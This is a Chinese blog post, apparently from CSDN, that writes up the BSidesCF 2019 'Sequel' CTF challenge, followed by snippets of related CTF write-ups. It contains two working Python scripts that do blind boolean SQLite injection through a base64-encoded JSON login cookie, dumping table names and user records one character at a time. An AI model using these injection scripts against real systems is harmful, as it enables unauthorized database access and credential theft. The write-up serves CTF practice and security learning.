[BSidesCF 2019]Sequel SQLite注入~~

最新推荐文章于 2022-02-10 00:30:00 发布
最新推荐文章于 2022-02-10 00:30:00 发布
阅读量1.4k 收藏
点赞数
分类专栏: BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/104334246
版权

题目描述

首先是登录,我们爆破一下就好了~~
然后得到用户名和密码均为guest~~
这时登录成功后会返回一个cookie,而且长得很可疑~~

set-cookie: 1337_AUTH=eyJ1c2VybmFtZSI6Imd1ZXN0IiwicGFzc3dvcmQiOiJndWVzdCJ9; HttpOnly

base64 解密一下得到

{"username":"guest","password":"guest"}

于是我们猜测是通过cookie注入~·
但是没想到得是数据库是SQLite,而不是mysql,搞了半天~~~

exp

import requests
import base64
import string
import sys
out = ""
while True:
    for letter in string.printable:
        tmp = out + letter
        payload = r'{{"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"{}\" limit 1) OR \"","password":"guest"}}'.format(tmp + '%')
        payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
        r = requests.get('https://sequel-9cba4c8e.challenges.bsidessf.net/sequels', cookies={"1337_AUTH" : payload})
        if "Movie" in r.text:
            out = tmp
            sys.stdout.write(letter)
            sys.stdout.flush()
            break

查询所有表名(必须自己手工多次查询)

拆了列名 username,password

import requests
import base64
import string
import sys

out = ""

while True:
    for letter in string.printable:
        tmp = out + letter

        if letter == 'g': continue

        payload = r'{{"username":"\" OR EXISTS(SELECT username FROM userinfo WHERE username LIKE \"{}\" limit 1) OR \"","password":"guest"}}'.format(tmp + '%')

        payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')

        r = requests.get('https://sequel-9cba4c8e.challenges.bsidessf.net/sequels', cookies={"1337_AUTH" : payload})
        if "Movie" in r.text:
            out = tmp
            sys.stdout.write(letter)
            sys.stdout.flush()
            break

我们除去g,是因为我们登录得用户名就是guest

最后再附上一张sqlite_master

CREATE TABLE sqlite_master ( 
type TEXT, 
name TEXT, 
tbl_name TEXT, 
rootpage INTEGER, 
sql TEXT 
);
HyyMbb
关注
专栏目录
BUUCTF--[BSidesCF 2019]Sequel
qq_46263951的博客
08-16 619
进入后是一个登录页面 爆破之后的到帐号和密码都是guest 这里有个很隐晦的提示,Maybe the admin likes it too? 查看Cookie,使用base64解密 接下来使用cookie注入,使用大佬的脚本 import requests import base64 import string import sys out = "" while True: for letter in string.printable: tmp = out + lette.
[BSidesCF 2019]Kookie
SopRomeo的博客
05-15 1071
提示要admin登录 根据题目名字传cookie 先用admin登录 发现用户名是以username传过去的,但是要传cookie 我把username和password全传了过去 他说我用 admin&password=admin!进行登录了,username=admin没了,把password删掉 出flag ...
BUUCTF:[BSidesCF 2019]Pick Tac Toe
末初的CSDN博客
08-05 771
题目地址:https://buuoj.cn/challenges#[BSidesCF%202019]Pick%20Tac%20Toe 九个格子每个对应了一个id号,可以通过抓包修改已经提交了的id号,实现三个连线
[BUUCTF][BSidesCF 2019]Pick Tac Toe
Y4tacker的博客
10-17 2692
在网页源代码当中发现 因此我们只需要按顺序post三个value来战胜ai,我分别是ul,c,bl
sequel-pro-1.1.2 sequel-pro-1.1.2
04-03
Sequel Pro是一款强大的MySQL数据库管理工具,主要用于Mac OS X操作系统。这款开源软件提供了一个直观、用户友好的图形界面,使得数据库管理和操作变得简单易行。版本1.1.2是Sequel Pro的一个特定发行版,可能包含了...
Sequel Ace: sequel Pro 兄弟版
07-31
Sequel Ace - 一个macOS的MySQL/MariaDB数据库管理;sequelPro 升级版 支持: macOS >= 10.10 MySQL >= 5.6 MariaDB 使用方式跟 sequel Pro 一样
Sequel-Ace-2.1.4/ sequelPro 升级版
07-20
Sequel Ace是一款专为macOS设计的高效MySQL和MariaDB数据库管理系统,它是Sequel Pro的升级版本,提供了更强大和现代的功能,以满足用户在数据库管理和操作上的需求。这款工具对于开发人员、数据库管理员以及对...
Sequel-Ace:适用于macOSMySQLMariaDB数据库管理
02-03
Sequel Ace是长期macOS工具Sequel Pro的“续集”。 Sequel Ace是一个快速,易于使用的Mac数据库管理应用程序,用于处理MySQL和MariaDB数据库。 如果您想赞助Sequel Ace,请查看我们的 ! 安装 Mac AppStore 立即...
Sequel Pro.app.zip
08-12
Sequel Pro是一款专为Mac OS X设计的强大且用户友好的MySQL数据库管理工具,它提供了直观的界面和丰富的功能,使得数据库管理和操作变得简单易行。标题"Sequel Pro.app.zip"表明这是一个压缩包,其中包含了Sequel ...
《CTF特训营》web部分读书笔记(一)SQL注入
闵行小鱼塘
07-25 1143
《ctf特训营》的读书笔记,由于笔者现在关注web方向,所以主要是web部分,其余部分留待以后,本节是sql注入
BUUCTF [BSidesCF 2019] Pick Tac Toe
Senimo
12-21 418
BUUCTF [BSidesCF 2019] Pick Tac Toe 启动环境: 一个九宫格的游戏,点击格子并不能下棋,对题目进行心思收集,在源码中: <form id='form_ul' method='POST' action='/move'> <input type='hidden' name='move' value='ul'> <td id='ul' onClick='$("#form_ul").submit()'> </td> &lt
[HarekazeCTF2019]Sqlite Voting
fmyyy1的博客
05-27 478
看提示应该是sqlite注入 可以直接下载到数据库结构和源码 DROP TABLE IF EXISTS `vote`; CREATE TABLE `vote` ( `id` INTEGER PRIMARY KEY AUTOINCREMENT, `name` TEXT NOT NULL, `count` INTEGER ); INSERT INTO `vote` (`name`, `count`) VALUES ('dog', 0), ('cat', 0), ('zebra', 0).
[BUUCTF-pwn] [BSidesCF 2019]Genius
weixin_52640415的博客
02-10 301
这个题打死也作不出来,看了个英文的wp 外国弄的这东西,思路不常见。一个是Genius文件是下人俄罗斯方块游戏(出的块是固定序列)这个本身没有问题。另外一个是loader文件,这个文件把游戏文件读入内存中,并允许修改两次每次1字节(通过一种JS啥的编码取5个字节中的若干位组成偏移和修改的字节)然后运行程序。 思路: 一是修改memset它在plt表中位置是XX30修改1字节改为XX20这个是system的plt表,以gameover的时候会调用到这个,就相当于system(XXX)了 ...
[BSidesCF 2020]Hurdles
cjdgg的博客
08-24 641
[BSidesCF 2020]Hurdles 这题进入后如上图所示,按要求访问/hurdles 按要求访问方式改成put 访问路径加上/! get参数的值为flag 传入”&=&=&“之前需要对其进行url编码,得%26%3D%26%3D%26,最后加上任意值: 这里的提示是其实仔细观察可以发现是两行,所以需要让&=&=&的值等于%00(换行符),其后还包含了一个换行符,也是进行url编码,%2500进行URL解码之后就是%00,得:%2500%0
[BUUCTF][BSidesCF 2020]Cards
Y4tacker的博客
10-20 3082
前言:很久没写博客了,虽然做了好多题,太懒了,这道题单纯就一个爬虫题目 文章目录思路wp 思路 我们在每次请求都会有一个SecretState参数,用来保存游戏状态,并且在客户端和服务端同步。这个参数没法篡改。每次请求,服务端都会生成一个新的SecretState,但是旧的SecretState并不失效,问题就出在于此。 游戏如果赢了,就更新SecretState,如果输了,则不更新SecretState。这样就可以达到类似一种分数只增不减的效果。 但是有个问题,下注之后要开牌的话,必须得用新的Secret
BSidesSF 2019 部分writeup
Kr的博客
03-06 2452
forensics: table-tennis 给了一个流量包,使用wireshark打开,通过查找字符串和跟踪TCP数据流并没有发现什么,以我的水平,基本上到这里就结束了。 后面查看了其他人写的writeup,跟着复现了一下。 这个流量包中除了大量的加密的TLS和TCP数据流,还有一些ICMP数据包,发现里面有HTML数据。 这里要将这些HTML数据提取出来,照着大佬使用pyt...
2019年CTF3月比赛记录(一):BSidesSF 2019 CTF_Web部分题目writeup与重解
極品━═☆宏的博客
03-07 4036
2019年CTF比赛记录(一) 为了更好地学习CTF方面的相关知识,本着以赛促学的目的,决定自己报名参加一些2019年的CTF比赛,在比赛中去学其他的知识,帮助自己更好的学习Web方面的知识。限于个人能力有限,而且在时间上的限制,比赛中仅对自己当时看到的题目和解出的题目进行了解答。 比赛:BSidesSF 2019 CTF 时间:2019年3月4日至2019年3月5日 ...
[BSidesSF 2019]Mixer ECB加密
a3320315的博客
02-15 1474
题目介绍 这儿需要我们登录,根据题目提示,我们需用admin登录就能拿到flag,我们先随便登录一下试试~~ 这儿返回了cookie,应该是某种加密~~ 但是题目并没有提示,尝试解码也并没有特别明显的线索,后来随便改一下user的值,发现报错,并且返回我们这儿猜测是cbc加密,因为其它的我也不知道 根据题目我们知道,解码应该为 {"first_name":"ma","last_name":"jia...
sequel pro闪退
最新发布
08-27
Sequel Pro是一个流行的Mac OS X平台上的MySQL数据库管理工具,它的闪退问题可能由多种因素引起,解决这类问题通常需要从以下几个方面入手: 1. 确认系统兼容性:首先需要确认你的操作系统版本是否与Sequel Pro的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值